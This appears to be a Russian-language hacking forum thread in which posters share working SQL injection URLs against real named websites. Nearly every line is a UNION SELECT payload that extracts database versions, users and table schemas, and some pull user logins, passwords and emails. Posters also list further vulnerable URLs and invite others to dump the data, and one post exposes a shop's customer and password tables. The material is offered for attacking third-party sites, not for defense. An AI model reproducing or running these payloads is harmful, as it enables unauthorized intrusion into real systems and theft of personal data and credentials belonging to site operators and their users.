Code: http://www.pr.ua/news.php?new=-3793+union+select+concat(user(),0x3a,version(),0x3a,database())/*
Code: http://cityonahillpress.com/article.php?id=-473+union+select+1,2,3,version(),database(),6,user(),8,9,10,11,12,13,14,15,16,17,18,19/*
Code: http://www.mp3prikol.ru/?action=view_track&track_id=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5,6,7/* Code: http://www.rightsite.ru/cgi-bin/list.pl?mode=show_yellow&kod_tovar=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,convert(concat(database(),char(58),user(),char(58),version()),char),13,14,15,16,17,18,19,20,21/* Code: http://www.vladimirka.ru/kulinar/?razdel=45&type=tovar&id=-1+union+select+1,222,3,4,555/*
Начал осваивать MsSQL. Магазичик всякой фигни =\ Вывод версии базы : ********** Tables : dtproperties, hits, cards, cards_dbtree, class_goods, class_goods2, class_pub, clients, D99_Tmp, DBTree, DBTreeHead, flowers, flowers_dbtree, fooo, forum, hits_eng, images, items_authors, items_authors_dbtree, items_authors_items_authors, items_goods, items_goods_dbtree, items_goods_items_pubs, items_menu, items_menu2,items_news, items_pubs, listcena, main_shtuchki, new_shtuchki, news_shtuchki, old_clients, old_orders, orders, sysconstraints, syssegments, t_jiaozhu, TecParam, timetable, timeuser, Users, valuta ********** Table : forum Columns : id_post, id_list, key_publik, name,gender, age, prof, message, title_answer, answer ********** Table : clients Columns : id_clients, date_create, fio, phones, mail, dostavka, adress, metro, package, comment, date_dostavka, place, discount, adv, ref, hide ********** Table : Users Columns : idUser, Nick, Password Сами значения выводить не пробовал, все в ваших руках! =)
Code: http://mosgs.ru/?module=card&view=full&id=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7,8,9,10,11,12/* http://mosgs.ru/?module=card&view=full&id=-1+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12+from+information_schema.tables+limit+19,1/* http://mosgs.ru/?module=card&view=full&id=-1+union+select+1,2,3,concat(table_schema,char(58),column_name),5,6,7,8,9,10,11,12+from+information_schema.columns+where+table_name=char(77,65,73,76)+limit+0,1/* http://mosgs.ru/?module=card&view=full&id=-1+union+select+1,2,3,concat(ID,char(58),EMAIL,char(58),ORGANIZATION_REF),5,6,7,8,9,10,11,12+from+db4797a.MAIL+limit+0,1/* Code: http://www.earngame.com/index.php?func=fileinfo&id=-1+union+select+1,2,3,4,5,6,7,8,9,concat(database(),char(58),user(),char(58),version()),11/*
не поверю чтоб ты не заметил версию Code: http://top100.disell.ru/top.php?cat=-1+union+select+1,null,concat(id,char(58),password,char(58),mail)+FROM+top_users/*
http://gostudy.com.ua Code: http://gostudy.com.ua/news.phtml?id=-40+union+select+1,concat(user(),0x3a,version()),3,4,5,6,7,8,9/*
Code: http://lib.chistopol.ru/?lib=dictionary&d=23&id=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version())/* http://lib.chistopol.ru/?lib=dictionary&d=23&id=-1+union+select+1,2,table_name+from+information_schema.tables+limit+46,1/* http://lib.chistopol.ru/?lib=dictionary&d=23&id=-1+union+select+1,2,concat(table_schema,char(58),column_name)+from+information_schema.columns+where+table_name=char(109,97,105,110,95,117,115,101,114)+limit+0,1/* http://lib.chistopol.ru/?lib=dictionary&d=23&id=-1+union+select+1,2,concat(id,char(58),user_login,char(58),user_pass,char(58),user_name,char(58),user_mail,char(58),user_url,char(58),user_icq,char(58),user_maillist,char(58),user_uroven)+from+svgroup_avenbibl.main_user+limit+0,1/*
http://www.jemjabella.co.uk/postbyid.php?id=' http://www2.bham.ac.uk/core/core_picker/download.asp?documenttable=' http://www.thecomedystore.co.uk/page.php?id=' http://www.franinfo.co.uk/exhibitors.php?id=' http://www.franinfo.co.uk/exhi_detail.php?id=' http://www.jemjabella.co.uk/postbyid.php?id=' http://www.teltonika.lt/ru/pages/view/?id=' http://www.bendruomenes.lt/news.php?id=' http://www.biuropasaulis.lt/pk/produkcija/models.php?id=' http://www.bendruomenes.lt/news.php?id=' http://www.avilys.lt/index.php?id=' http://paulauskas.president.lt/one.phtml?id=' http://www.skautai.lt/users.php?id=' http://www.skautai.lt/index.php?id=' http://kaunas.lcn.lt/arkikatedra/index.php?id=' http://www.auksinisvarnas.lt/index.php?id=' http://www.eurodesk.lt/index.php?language=' http://www.esecurity.lt/article.php?id=' http://leidykla.ktu.lt/main.php?ID=' вот щас очень занят а хотел поковырять --давайте сами =)
Вывод в title'е: Code: http://www.islamcom.ru/material.php?id=10000000+union+select+concat(database(),char(58),user(),char(58),version()),2,3,4,5,6,7,8,9,10,11,12,13,14/* http://www.islamcom.ru/material.php?id=10000000+union+select+table_name,2,3,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables+limit+20,1/* http://www.islamcom.ru/material.php?id=10000000+union+select+table_column,2,3,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_name=char(105,99,95,115,117,98,115,99,114,105,98,101,114,115)+limit+0,1/* http://www.islamcom.ru/material.php?id=10000000+union+select+concat(id,char(58),email),2,3,4,5,6,7,8,9,10,11,12,13,14+from+ic_subscribers+limit+6,1/*
Code: http://www.ezgulik.org/news.php?id=-197+union+select+1,2,version(),concat(user(),0x3a,database()),5,6/*&status=1
http://www.karavan-megastore.com.ua Версия MySql: Code: http://www.karavan-megastore.com.ua/?view=read&n_id=-43+UNION+SELECT+null,VERSION(),null,null Логин текущего пользователя базы данных: Code: http://www.karavan-megastore.com.ua/?view=read&n_id=-43+UNION+SELECT+null,USER(),null,null Имя используемой базы данных: Code: http://www.karavan-megastore.com.ua/?view=read&n_id=-43+UNION+SELECT+null,DATABASE(),null,null Вот так всё простинька))
Code: http://www.payolibre.com/noticias/noticias2.php?id=-413+union+select+1,2,3,4,user(),6/* Code: http://www.jerashfestival.com.jo/inner.php?id=-9+union+select+version()/* Code: http://www.iblaw.com.jo/practice.php?id=-8+union+select+1,database(),3,4/*
Code: http://www.uris.com.ua/index.php?page=8&id=-8+union+select+1,2,concat(database(),0x3a,version()),4,5,6/* вывод в title: Code: http://www.designplace.org/tutorials.php?page=1&c_id=-27+union+select+version(),2,3/*
